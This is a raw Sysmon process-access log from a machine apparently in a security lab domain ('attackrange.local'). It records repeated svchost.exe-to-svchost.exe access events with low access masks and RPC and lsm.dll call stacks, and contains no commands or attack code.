12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 